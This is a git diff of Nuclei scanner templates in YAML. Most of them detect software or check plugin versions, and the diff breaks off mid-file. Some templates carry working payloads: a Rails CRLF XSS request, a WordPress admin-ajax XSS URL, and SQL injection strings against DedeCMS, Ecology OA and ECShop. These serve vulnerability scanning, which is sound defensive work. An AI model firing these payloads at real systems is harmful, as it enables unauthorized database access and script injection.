"{{BaseURL}}/1238a92f573a48e58d356c42ca2c9610" + - "{{BaseURL}}/{{randstr}}" + matchers: - type: word + part: body words: - "Rails.root:" - "Action Controller: Exception caught" - condition: and - part: body + condition: and \ No newline at end of file diff --git a/poc/ruby/rails-secret-token-disclosure-9810.yaml b/poc/ruby/rails-secret-token-disclosure-9810.yaml index 387218b6c6..e4ee81cfd0 100644 --- a/poc/ruby/rails-secret-token-disclosure-9810.yaml +++ b/poc/ruby/rails-secret-token-disclosure-9810.yaml @@ -1,10 +1,13 @@ id: rails-secret-token-disclosure + info: name: Ruby on Rails Secret Token Disclosure author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json tags: exposure,files,rails,ruby,token + requests: - method: GET path: @@ -17,6 +20,7 @@ requests: - "config.secret_token =" part: body condition: and + - type: status status: - 200 diff --git a/poc/ruby/rails6-xss-9800.yaml b/poc/ruby/rails6-xss-9800.yaml index 6bc1c7b911..e6a188d876 100644 --- a/poc/ruby/rails6-xss-9800.yaml +++ b/poc/ruby/rails6-xss-9800.yaml @@ -1,24 +1,19 @@ id: rails6-xss - -# XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); -# Nuclei has issues with 302 response missing a Location header thus the -# extended payload to make Nuclei work. -# Working poc by @Mad-robot -# /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 - info: name: Rails CRLF XSS (6.0.0 < rails < 6.0.3.2) author: ooooooo_q,rootxharsh,iamnoooob severity: medium - reference: - - https://hackerone.com/reports/904059 + reference: https://hackerone.com/reports/904059 tags: rails,xss,crlf - + # XSS (6.0.0 < rails < 6.0.3.2); Payload is location=%0djavascript:alert(1); + # Nuclei has issues with 302 response missing a Location header thus the + # extended payload to make Nuclei work. + # Working poc by @Mad-robot + # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 requests: - method: POST path: - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" - matchers-condition: and matchers: - type: word diff --git a/poc/samba/samba-detect-9990.yaml b/poc/samba/samba-detect-9990.yaml index 68f0879828..5f5d007c7e 100644 --- a/poc/samba/samba-detect-9990.yaml +++ b/poc/samba/samba-detect-9990.yaml @@ -1,18 +1,18 @@ id: samba-detection + info: name: Samba Detection - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. - remediation: Always apply the latest security patch. author: pussycat0x severity: info - tags: network,smb,samba + description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. reference: - https://www.samba.org/samba/what_is_samba.html - https://www.samba.org/samba/history/security.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + remediation: Always apply the latest security patch. + tags: network,smb,samba + network: - inputs: - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 diff --git a/poc/sap/sap-igs-detect-10039.yaml b/poc/sap/sap-igs-detect-10039.yaml index 023ec23436..9813f9533e 100644 --- a/poc/sap/sap-igs-detect-10039.yaml +++ b/poc/sap/sap-igs-detect-10039.yaml @@ -1,14 +1,17 @@ id: sap-igs-detect + info: name: SAP Internet Graphics Server (IGS) Detection author: _generic_human_ severity: info description: Detection of SAP Internet Graphics Server (IGS) tags: sap,tech,igs + requests: - method: GET path: - "{{BaseURL}}" + redirects: true max-redirects: 2 matchers-condition: and @@ -19,13 +22,16 @@ requests: - "SAP IGS" - "is running" condition: and + - type: status status: - 200 + - type: word part: header words: - "SAP Internet Graphics Server" + extractors: - type: kval part: header diff --git a/poc/sap/sap-netweaver-detect-10047.yaml b/poc/sap/sap-netweaver-detect-10047.yaml index 9fe826a6f5..edbd2eaef5 100644 --- a/poc/sap/sap-netweaver-detect-10047.yaml +++ b/poc/sap/sap-netweaver-detect-10047.yaml @@ -1,17 +1,14 @@ id: sap-netweaver-detect - info: name: SAP NetWeaver ICM Detection author: randomstr1ng - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) severity: info + description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) tags: sap,webserver - requests: - method: GET path: - "{{BaseURL}}" - redirects: true max-redirects: 2 matchers: @@ -22,7 +19,6 @@ requests: - "Sap-Server:" - "SAP NetWeaver Application Server" condition: or - extractors: - type: kval part: header diff --git a/poc/sap/sap-netweaver-webgui-10059.yaml b/poc/sap/sap-netweaver-webgui-10059.yaml index 270fb7fc0a..c9974f3576 100644 --- a/poc/sap/sap-netweaver-webgui-10059.yaml +++ b/poc/sap/sap-netweaver-webgui-10059.yaml @@ -1,17 +1,14 @@ id: sap-nw-webgui - info: name: SAP NetWeaver WebGUI Detection author: randomstr1ng severity: info description: Detection of SAP NetWeaver ABAP Webserver WebGUI tags: sap,webserver - requests: - method: GET path: - "{{BaseURL}}/sap/bc/gui/sap/its/webgui" - redirects: true max-redirects: 2 matchers: diff --git a/poc/sap/sap-web-dispatcher-10076.yaml b/poc/sap/sap-web-dispatcher-10076.yaml index df212cb10b..cf5e1ad308 100644 --- a/poc/sap/sap-web-dispatcher-10076.yaml +++ b/poc/sap/sap-web-dispatcher-10076.yaml @@ -2,17 +2,18 @@ id: sap-web-dispatcher-detection info: name: SAP Web Dispatcher detection author: randomstr1ng - severity: info description: Detection of SAP Web Dispatcher service + severity: info tags: sap,webserver,proxy requests: - method: GET redirects: true - max-redirects: 2 + max-redirects: 5 path: - "{{BaseURL}}/inormalydonotexist" + matchers-condition: or matchers: - - type: word + - type: regex part: body - words: - - "This error page was generated by SAP Web Dispatcher" + regex: + - "SAP Web Dispatcher" diff --git a/poc/sap/sapfiori-panel-10034.yaml b/poc/sap/sapfiori-panel-10034.yaml index bb5e0cd842..bfe54a8494 100644 --- a/poc/sap/sapfiori-panel-10034.yaml +++ b/poc/sap/sapfiori-panel-10034.yaml @@ -1,18 +1,15 @@ id: sapfiori-panel - info: name: SAP Fiori Instance Detection Template author: righettod severity: info description: Try to detect the presence of a SAP Fiori instance via the login page tags: panel,sap,fiori - requests: - method: GET path: - "{{BaseURL}}/fiori" - "{{BaseURL}}/irj/portal/fiori" - matchers-condition: or matchers: - type: word @@ -21,10 +18,9 @@ requests: - 'action="/fiori"' part: body condition: and - - type: word words: - "UIPPortalPath" - "/irj/portal/fiori" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/search/elasticsearch-7197.yaml b/poc/search/elasticsearch-7197.yaml index afd1f48e29..32aaf22f15 100644 --- a/poc/search/elasticsearch-7197.yaml +++ b/poc/search/elasticsearch-7197.yaml @@ -2,9 +2,6 @@ id: elasticsearch info: name: ElasticSearch Information Disclosure - reference: - - https://www.elastic.co/blog/a-practical-introduction-to-elasticsearch - - https://discuss.elastic.co/t/how-to-find-elastic-search-version/8737 author: Shine,c-sh0 severity: low tags: elastic,unauth,elasticsearch @@ -16,21 +13,21 @@ requests: - '{{BaseURL}}/_cat/indices?v' - '{{BaseURL}}/_all/_search' + stop-at-first-match: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - - '"You Know, for Search"' - '"took":' - - 'status' + - '"number" :' condition: or + - type: status + status: + - 200 + extractors: - - type: regex + - type: regex part: body group: 1 regex: diff --git a/poc/search/searches (copy 1).yaml b/poc/search/searches (copy 1).yaml index 8cec0f7063..6088c3fee7 100644 --- a/poc/search/searches (copy 1).yaml +++ b/poc/search/searches (copy 1).yaml @@ -1,12 +1,10 @@ id: search-field - info: name: Search Field Detection Template author: foulenzer severity: info description: Searches Response body for input-tag and id= or name= tags: search,input - requests: - method: GET redirects: true @@ -14,7 +12,6 @@ requests: max-redirects: 1 path: - "{{BaseURL}}/" - matchers-condition: and matchers: - type: word @@ -32,11 +29,9 @@ requests: - 'name="searchbar"' - 'name="suche"' condition: or - - type: status status: - 200 - - type: word words: - - '":""}]' - - 'facebook' - - 'twitter' - part: body - condition: and - - type: status - status: - - 200 +- matchers: + - type: word + condition: and + part: body + words: + - '[{"":""}]' + - facebook + - twitter + - type: word + part: header + negative: true + words: + - application/json + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=' + method: GET diff --git a/poc/social/simple-social-share-7fcd52af02923c5f69d82802a271c940.yaml b/poc/social/simple-social-share-7fcd52af02923c5f69d82802a271c940.yaml new file mode 100644 index 0000000000..fb4e753986 --- /dev/null +++ b/poc/social/simple-social-share-7fcd52af02923c5f69d82802a271c940.yaml @@ -0,0 +1,59 @@ +id: simple-social-share-7fcd52af02923c5f69d82802a271c940 + +info: + name: > + Simple Social Share <= 3.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b066f1fe-b416-4fe8-891d-b9c33664df89?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/simple-social-share/" + google-query: inurl:"/wp-content/plugins/simple-social-share/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,simple-social-share,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-social-share/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-social-share" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0') \ No newline at end of file diff --git a/poc/social/twitter-secret-11870.yaml b/poc/social/twitter-secret-11870.yaml index 824660405a..e7052b9a1a 100644 --- a/poc/social/twitter-secret-11870.yaml +++ b/poc/social/twitter-secret-11870.yaml @@ -1,14 +1,16 @@ id: twitter-secret + info: name: Twitter Secret - author: gaurang,daffainfo + author: gaurang severity: medium tags: token,file,twitter + file: - extensions: - all + extractors: - type: regex regex: - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}" - - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" diff --git a/poc/social/ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6.yaml b/poc/social/ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6.yaml new file mode 100644 index 0000000000..7d4dc5956d --- /dev/null +++ b/poc/social/ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6.yaml @@ -0,0 +1,59 @@ +id: ultimate-social-media-icons-de7de394482ec451d74469e2163b8cf6 + +info: + name: > + Social Media & Share Icons <= 2.9.1 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/95f1b5ca-5110-407a-8fbb-375ac445294b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ultimate-social-media-icons/" + google-query: inurl:"/wp-content/plugins/ultimate-social-media-icons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ultimate-social-media-icons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-social-media-icons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-social-media-icons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.1') \ No newline at end of file diff --git a/poc/social/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml b/poc/social/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml new file mode 100644 index 0000000000..4d27105978 --- /dev/null +++ b/poc/social/woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a.yaml @@ -0,0 +1,59 @@ +id: woo-social-login-5d26f7f4cd542d88ac86877ec3302d5a + +info: + name: > + WooCommerce Social Login <= 2.6.3 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1e51951-0e4c-44f3-a11b-13c0be984a7f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-social-login/" + google-query: inurl:"/wp-content/plugins/woo-social-login/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-social-login,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-social-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-social-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.3') \ No newline at end of file diff --git a/poc/sql/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml b/poc/sql/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml new file mode 100644 index 0000000000..ffeb71d947 --- /dev/null +++ b/poc/sql/CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-5127-a7f79b7db76a186e4a88065c0255d51e + +info: + name: > + WP Font Awesome <= 1.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode + author: topscoder + severity: low + description: > + The WP Font Awesome plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping on 'icon' user supplied attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/59ee0b56-c11f-4951-aac0-8344200e4484?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2023-5127 + metadata: + fofa-query: "wp-content/plugins/wp-font-awesome/" + google-query: inurl:"/wp-content/plugins/wp-font-awesome/" + shodan-query: 'vuln:CVE-2023-5127' + tags: cve,wordpress,wp-plugin,wp-font-awesome,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-font-awesome/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-font-awesome" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.9') \ No newline at end of file diff --git a/poc/sql/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml b/poc/sql/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml new file mode 100644 index 0000000000..c75d21759f --- /dev/null +++ b/poc/sql/CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-1375-1c5d367114d7ddb0cfb5bf0cfba7e6f4 + +info: + name: > + Event post <= 5.9.5 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Event post plugin for WordPress is vulnerable to unauthorized bulk metadata update due to a missing nonce check on the save_bulkdatas function in all versions up to, and including, 5.9.5. This makes it possible for unauthenticated attackers to update post_meta_data via a forged request, granted they can trick a logged-in user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/964950dc-d8e1-4a9b-bef2-ea51abc5a925?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-1375 + metadata: + fofa-query: "wp-content/plugins/event-post/" + google-query: inurl:"/wp-content/plugins/event-post/" + shodan-query: 'vuln:CVE-2024-1375' + tags: cve,wordpress,wp-plugin,event-post,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/event-post/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "event-post" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.9.5') \ No newline at end of file diff --git a/poc/sql/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml b/poc/sql/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml new file mode 100644 index 0000000000..81a0a6d6c4 --- /dev/null +++ b/poc/sql/CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6340-b92db2bd08ff1e8a54a1c37865c95bfd + +info: + name: > + Premium Addons for Elementor <= 4.10.36 - Authenticated (Contributor+) Stored Cross-Site Scripting via Countdown Widget + author: topscoder + severity: low + description: > + The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 4.10.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 4.10.36 and fully patched in version 4.10.37. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9ed80507-f3e5-45a8-9498-8cebf97155ff?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6340 + metadata: + fofa-query: "wp-content/plugins/premium-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/premium-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-6340' + tags: cve,wordpress,wp-plugin,premium-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "premium-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.10.36') \ No newline at end of file diff --git a/poc/sql/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml b/poc/sql/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml new file mode 100644 index 0000000000..b7c0e62410 --- /dev/null +++ b/poc/sql/CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6392-fedb5f8d165b9e77244d2586825aec11 + +info: + name: > + Image Optimizer, Resizer and CDN – Sirv <= 7.2.7 - Authenticated(Subscriber+) Missing Authorization to Plugin Settings Update + author: topscoder + severity: low + description: > + The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to unauthorized plugin settings modification due to missing capability checks on the plugin functions in all versions up to, and including, 7.2.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the connected Sirv account to an attacker-controlled one. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/229490c3-d820-4831-b105-a429512c2c60?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-6392 + metadata: + fofa-query: "wp-content/plugins/sirv/" + google-query: inurl:"/wp-content/plugins/sirv/" + shodan-query: 'vuln:CVE-2024-6392' + tags: cve,wordpress,wp-plugin,sirv,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sirv/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sirv" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.2.7') \ No newline at end of file diff --git a/poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml b/poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml new file mode 100644 index 0000000000..601fe77291 --- /dev/null +++ b/poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6588-af347ddbbf742df5b2786c5ede788153 + +info: + name: > + PowerPress Podcasting plugin by Blubrry <= 11.9.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via media_url Parameter + author: topscoder + severity: low + description: > + The PowerPress Podcasting plugin by Blubrry plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘media_url’ parameter in all versions up to, and including, 11.9.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/745262f6-4f73-453e-b650-15115536f221?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6588 + metadata: + fofa-query: "wp-content/plugins/powerpress/" + google-query: inurl:"/wp-content/plugins/powerpress/" + shodan-query: 'vuln:CVE-2024-6588' + tags: cve,wordpress,wp-plugin,powerpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/powerpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "powerpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 11.9.10') \ No newline at end of file diff --git a/poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml b/poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml new file mode 100644 index 0000000000..7f223d665a --- /dev/null +++ b/poc/sql/counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac.yaml @@ -0,0 +1,59 @@ +id: counterpoint-4e848d0e70e34ae5f5dbfea5a0844aac + +info: + name: > + Counterpoint <= 1.8.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0975cc9d-7130-4802-bba2-b52d4b79edcd?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/counterpoint/" + google-query: inurl:"/wp-content/themes/counterpoint/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,counterpoint,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/counterpoint/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "counterpoint" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.1') \ No newline at end of file diff --git a/poc/sql/dedecms-membergroup-sqli-6796.yaml b/poc/sql/dedecms-membergroup-sqli-6796.yaml index 603eb805a9..6ab43810d6 100644 --- a/poc/sql/dedecms-membergroup-sqli-6796.yaml +++ b/poc/sql/dedecms-membergroup-sqli-6796.yaml @@ -1,21 +1,27 @@ id: dedecms-membergroup-sqli + info: name: DedeCMS Membergroup SQLI author: pikpikcu severity: medium description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. - reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html + reference: + - http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms + requests: - method: GET path: - "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`" + matchers-condition: and matchers: + - type: word words: - "52c69e3a57331081823331c4e69d3f2e" part: body + - type: status status: - 200 diff --git a/poc/sql/ecology-syncuserinfo-sqli-7177.yaml b/poc/sql/ecology-syncuserinfo-sqli-7177.yaml index 77ccaabf31..ab5309607b 100644 --- a/poc/sql/ecology-syncuserinfo-sqli-7177.yaml +++ b/poc/sql/ecology-syncuserinfo-sqli-7177.yaml @@ -1,25 +1,39 @@ id: ecology-syncuserinfo-sqli + info: - name: Ecology Syncuserinfo Sqli + name: Ecology Syncuserinfo - SQL Injection author: ritikchaddha - severity: high + severity: critical + description: Ecology Syncuserinfo contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://www.weaver.com.cn/ + - https://github.com/chaitin/xray/blob/master/pocs/ecology-syncuserinfo-sqli.yml + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-89 metadata: + max-request: 1 fofa-query: app="泛微-协同办公OA" tags: ecology,sqli -requests: + +http: - method: GET path: - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null" - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - "4386499557" + - type: status status: - 200 + +# digest: 4a0a0047304502207c7fdd7332a97f18ef506df96a746a9b815d76ae5c170f26537e3194eb09e907022100ad8b614f3075221e0152d3b945f6685ece46e871c092f46f7e01bec6a6be1dc4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/sql/ecshop-sqli-7180.yaml b/poc/sql/ecshop-sqli-7180.yaml index fbb70eb64c..47a60acc94 100644 --- a/poc/sql/ecshop-sqli-7180.yaml +++ b/poc/sql/ecshop-sqli-7180.yaml @@ -1,5 +1,4 @@ id: ecshop-sqli - info: name: ECShop 2.x/3.x SQL Injection author: Lark-lab,ImNightmaree,ritikchaddha @@ -15,7 +14,6 @@ info: verified: true fofa-query: app="ECShop" tags: sqli,php,ecshop - requests: - raw: - | @@ -23,13 +21,11 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} - - | GET /user.php?act=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca - stop-at-first-match: true matchers-condition: or matchers: @@ -40,7 +36,6 @@ requests: - '[0] => Array' - 'MySQL server error report:Array' condition: and - - type: word words: - "PHP Extension" diff --git a/poc/sql/error-based-sql-injection-7249.yaml b/poc/sql/error-based-sql-injection-7249.yaml index f988118325..4cb4621ef2 100644 --- a/poc/sql/error-based-sql-injection-7249.yaml +++ b/poc/sql/error-based-sql-injection-7249.yaml @@ -1,14 +1,23 @@ id: error-based-sql-injection + info: name: Error based SQL injection author: geeknik - severity: high - description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. - tags: sqli -requests: + severity: critical + description: A SQL injection vulnerability was identified based on an error message returned by the server. + classification: + cvss-metrics: 